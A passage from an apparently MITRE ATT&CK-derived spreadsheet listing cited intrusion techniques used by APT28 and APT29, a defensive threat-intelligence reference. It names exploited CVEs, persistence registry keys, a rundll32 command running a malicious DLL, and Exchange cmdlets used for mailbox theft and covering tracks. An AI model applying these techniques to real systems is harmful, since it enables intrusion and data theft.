    <t xml:space="preserve">[APT28](https://attack.mitre.org/groups/G0007) can exfiltrate data over Google Drive.(Citation: TrendMicro Pawn Storm Dec 2020) </t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites.(Citation: US District Court Indictment GRU Oct 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used CVE-2015-4902 to bypass security features.(Citation: Bitdefender APT28 Dec 2015)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges.(Citation: Bitdefender APT28 Dec 2015)(Citation: Microsoft SIR Vol 19)(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.(Citation: FireEye APT28)(Citation: FireEye APT28 Hospitality Aug 2017)(Citation: MS17-010 March 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. [APT28](https://attack.mitre.org/groups/G0007) has also used a machine to relay and obscure communications between [CHOPSTICK](https://attack.mitre.org/software/S0023) and their server.(Citation: FireEye APT28)(Citation: Bitdefender APT28 Dec 2015)(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used [Tor](https://attack.mitre.org/software/S0183) and a variety of commercial VPN services to route brute force authentication attempts.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used [Forfiles](https://attack.mitre.org/software/S0193) to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms.(Citation: Überwachung APT28 Forfiles June 2015)(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has saved files with hidden file attributes.(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used the WindowStyle parameter to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: Palo Alto Sofacy 06-2018) (Citation: McAfee APT28 DDE1 Nov 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.(Citation: Bitdefender APT28 Dec 2015)(Citation: Unit 42 Playbook Dec 2017)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) added "junk data" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a "junk length" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used tools to perform keylogging.(Citation: Microsoft SIR Vol 19)(Citation: DOJ GRU Indictment Jul 2018)(Citation: TrendMicro Pawn Storm Dec 2020)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) regularly deploys both publicly available (ex: [Mimikatz](https://attack.mitre.org/software/S0002)) and custom password retrieval tools on victims.(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018) They have also dumped the LSASS process memory using the MiniDump function.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has stored captured credential information in a file named pi.log.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan adds the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; to establish persistence.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims.(Citation: FireEye APT28)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.(Citation: Unit 42 Sofacy Feb 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.(Citation: US District Court Indictment GRU Oct 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has renamed the WinRAR utility to avoid detection.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has routed traffic over [Tor](https://attack.mitre.org/software/S0183) and VPN servers to obfuscate their activities.(Citation: TrendMicro Pawn Storm Dec 2020)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used the ntdsutil.exe utility to export the Active Directory database for credential access.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>In 2016, [APT28](https://attack.mitre.org/groups/G0007) conducted a distributed denial of service (DDoS) attack against the World Anti-Doping Agency.(Citation: US District Court Indictment GRU Oct 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials.(Citation: FireEye APT28)(Citation: FireEye APT28 Hospitality Aug 2017) [APT28](https://attack.mitre.org/groups/G0007) close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials.(Citation: US District Court Indictment GRU Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT28](https://attack.mitre.org/groups/G0007) regularly deploys both publicly available (ex: [Mimikatz](https://attack.mitre.org/software/S0002)) and custom password retrieval tools on victims.(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018)(Citation: US District Court Indictment GRU Oct 2018)	</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) encrypted a .dll payload using RTL and a custom encryption algorithm. [APT28](https://attack.mitre.org/groups/G0007) has also obfuscated payloads with base64, XOR, and RC4.(Citation: Bitdefender APT28 Dec 2015)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Palo Alto Sofacy 06-2018)(Citation: Talos Seduploader Oct 2017)(Citation: Accenture SNAKEMACKEREL Nov 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key &lt;code&gt;HKCU\Software\Microsoft\Office test\Special\Perf&lt;/code&gt; to execute code.(Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used pass the hash for lateral movement.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days.(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020) [APT28](https://attack.mitre.org/groups/G0007) has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a brute-force/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks.(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: Microsoft Targeting Elections September 2020) [APT28](https://attack.mitre.org/groups/G0007) has also used a Kubernetes cluster to conduct distributed, large-scale password spray attacks.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) uses a module to receive a notification every time a USB mass storage device is inserted into a victim.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used spearphishing to compromise credentials.(Citation: Microsoft Targeting Elections September 2020)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) downloads and executes PowerShell scripts and performs PowerShell commands.(Citation: Palo Alto Sofacy 06-2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has deployed malware that has copied itself to the startup directory for persistence.(Citation: TrendMicro Pawn Storm Dec 2020)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has staged archives of collected data on a target's Outlook Web Access (OWA) server.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has collected emails from victim Microsoft Exchange servers.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a UEFI (Unified Extensible Firmware Interface) rootkit known as [LoJax](https://attack.mitre.org/software/S0397).(Citation: Symantec APT28 Oct 2018)(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) executed [CHOPSTICK](https://attack.mitre.org/software/S0023) by using rundll32 commands such as &lt;code&gt;rundll32.exe “C:\Windows\twain_64.dll”&lt;/code&gt;. [APT28](https://attack.mitre.org/groups/G0007) also executed a .dll for a first stage dropper using rundll32.exe. An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.(Citation: Crowdstrike DNC June 2016)(Citation: Bitdefender APT28 Dec 2015)(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit 42 Playbook Dec 2017)(Citation: ESET Zebrocy May 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has mapped network drives using [Net](https://attack.mitre.org/software/S0039) and administrator credentials.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used tools to take screenshots from victims.(Citation: ESET Sednit Part 2)(Citation: XAgentOSX 2017)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has collected information from Microsoft SharePoint services within target networks.(Citation: RSAC 2015 Abu Dhabi Stefano Maccaglia)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) sent spearphishing emails containing malicious Microsoft Office and RAR attachments.(Citation: Unit 42 Sofacy Feb 2018)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has conducted credential phishing campaigns with embedded links to attacker-controlled domains.(Citation: Google TAG Ukraine Threat Landscape March 2022)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.(Citation: DOJ GRU Indictment Jul 2018)(Citation: ESET Zebrocy May 2019)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used several malicious applications to steal user OAuth access tokens including applications masquerading as "Google Defender" "Google Email Protection," and "Google Scanner" for Gmail users. They also targeted Yahoo users with applications masquerading as "Delivery Service" and "McAfee Email Protection".(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) installed a Delphi backdoor that used a custom algorithm for C2 communications.(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro. (Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has performed timestomping on victim files.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation.(Citation: FireEye Op RussianDoll)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has obtained and used open-source tools like [Koadic](https://attack.mitre.org/software/S0250), [Mimikatz](https://attack.mitre.org/software/S0002), and [Responder](https://attack.mitre.org/software/S0174).(Citation: Palo Alto Sofacy 06-2018)(Citation: Securelist Sofacy Feb 2018)(Citation: FireEye APT28 Hospitality Aug 2017)</t>
  </si>
  <si>
    <t>Once [APT28](https://attack.mitre.org/groups/G0007) gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder.(Citation: Trend Micro Pawn Storm April 2017)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has performed large-scale scans in an attempt to find vulnerable servers.(Citation: TrendMicro Pawn Storm 2019)</t>
  </si>
  <si>
    <t>Later implants used by [APT28](https://attack.mitre.org/groups/G0007), such as [CHOPSTICK](https://attack.mitre.org/software/S0023), use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.(Citation: FireEye APT28)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used newly-created Blogspot pages for credential harvesting operations.(Citation: Google TAG Ukraine Threat Landscape March 2022)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan uses a cmd.exe and batch script to run its payload.(Citation: Unit 42 Playbook Dec 2017) The group has also used macros to execute payloads.(Citation: Talos Seduploader Oct 2017)(Citation: Unit42 Cannon Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: TrendMicro Pawn Storm Dec 2020)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used sticky-keys to obtain unauthenticated, privileged console access.(Citation: Mandiant No Easy Breach)(Citation: FireEye APT29 Domain Fronting)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) obtained a list of users and their roles from an Exchange server using &lt;code&gt;Get-ManagementRoleAssignment&lt;/code&gt;.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has added credentials to OAuth Applications and Service Principals.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT29](https://attack.mitre.org/groups/G0016) has granted `company administrator` privileges to a newly created service principal.(Citation: CrowdStrike StellarParticle January 2022) </t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) added their own devices as allowed IDs for active sync using &lt;code&gt;Set-CASMailbox&lt;/code&gt;, allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.(Citation: Volexity SolarWinds)(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used compromised service principals to make changes to the Office 365 environment.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration; [APT29](https://attack.mitre.org/groups/G0016) has also compressed text files into zipped archives.(Citation: Volexity SolarWinds)(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used social media platforms to hide communications to C2 servers.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used large file sizes to avoid detection.(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has bypassed UAC.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) removed evidence of email export requests using &lt;code&gt;Remove-MailboxExportRequest&lt;/code&gt;.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has conducted enumeration of Azure AD accounts.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) can create new users through Azure AD.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used a compromised O365 administrator account to create a new Service Principal.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has downloaded source code from code repositories.(Citation: Microsoft Internal Solorigate Investigation Blog)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) was able to get [SUNBURST](https://attack.mitre.org/software/S0559) signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) gained initial network access to some victims via a trojanized update of SolarWinds Orion software.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Secureworks IRON RITUAL Profile)(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has conducted credential theft operations to obtain credentials to be used for access to victim environments.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used account credentials they obtained to attempt access to Group Managed Service Account (gMSA) passwords.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has stolen user's saved passwords from Chrome.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) leveraged privileged accounts to replicate directory service data with domain controllers.(Citation: Microsoft 365 Defender Solorigate)(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has accessed victims’ internal knowledge repositories (wikis) to view sensitive corporate information on products, services, and internal business operations.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT29](https://attack.mitre.org/groups/G0016) has extracted files from compromised networks.(Citation: Volexity SolarWinds) </t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used 7-Zip to decode its [Raindrop](https://attack.mitre.org/software/S0565) malware.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) registered devices in order to enable mailbox syncing via the &lt;code&gt;Set-CASMailbox&lt;/code&gt; command.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has created self-signed digital certificates to enable mutual TLS authentication for malware.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used &lt;code&gt;AUDITPOL&lt;/code&gt; to prevent the collection of audit logs.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used &lt;code&gt;netsh&lt;/code&gt; to configure firewall rules that limited certain UDP outbound packets.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used the service control manager on a remote system to disable services associated with security monitoring products.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used PowerShell to discover domain accounts by executing &lt;code&gt;Get-ADUser&lt;/code&gt; and &lt;code&gt;Get-ADGroupMember&lt;/code&gt;.(Citation: CrowdStrike StellarParticle January 2022)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used valid accounts, including administrator accounts, to help facilitate lateral movement on compromised networks.(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used the meek domain fronting plugin for [Tor](https://attack.mitre.org/software/S0183) to hide the destination of C2 traffic.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used [AdFind](https://attack.mitre.org/software/S0552) to enumerate domain groups.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used the &lt;code&gt;Get-AcceptedDomain&lt;/code&gt; PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell.(Citation: Volexity SolarWinds) They also used [AdFind](https://attack.mitre.org/software/S0552) to enumerate domains and to discover trust between federated domains.(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) changed domain federation trust settings using Azure AD administrative permissions to configure the domain to accept authorization tokens signed by their own SAML signing certificate.(Citation: Microsoft 365 Defender Solorigate)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has acquired C2 domains, sometimes through resellers.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: MSTIC NOBELIUM May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has compromised domains to use for C2.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has compromised email accounts to further enable phishing campaigns.(Citation: ANSSI Nobelium Phishing December 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used multiple layers of encryption within malware to protect C2 communication.(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access. They have also exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network.(Citation: NCSC APT29 July 2020)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.(Citation: F-Secure The Dukes)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: MSTIC NOBELIUM May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has exploited CVE-2021-36934 to escalate privileges on a compromised host.(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used compromised identities to access networks via SSH,  VPNs, and other remote access tools.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: NCSC APT29 July 2020)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) routinely removed their tools, including custom backdoors, once remote access was achieved. [APT29](https://attack.mitre.org/groups/G0016) has also used [SDelete](https://attack.mitre.org/software/S0195) to remove artifacts from victims.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) obtained information about the configured Exchange virtual directory using &lt;code&gt;Get-WebServicesVirtualDirectory&lt;/code&gt;.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT29](https://attack.mitre.org/groups/G0016) has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.(Citation: ESET T3 Threat Report 2021) </t>
  </si>
  <si>
    <t>APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has downloaded additional tools, such as [TEARDROP](https://attack.mitre.org/software/S0560) malware and [Cobalt Strike](https://attack.mitre.org/software/S0154), to a compromised host following initial access.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used SSH port forwarding capabilities on public-facing systems, and configured at least one instance of [Cobalt Strike](https://attack.mitre.org/software/S0154) to use a network pipe over SMB during the 2020 SolarWinds intrusion.(Citation: Symantec RAINDROP January 2021)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used [GoldFinder](https://attack.mitre.org/software/S0597) to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
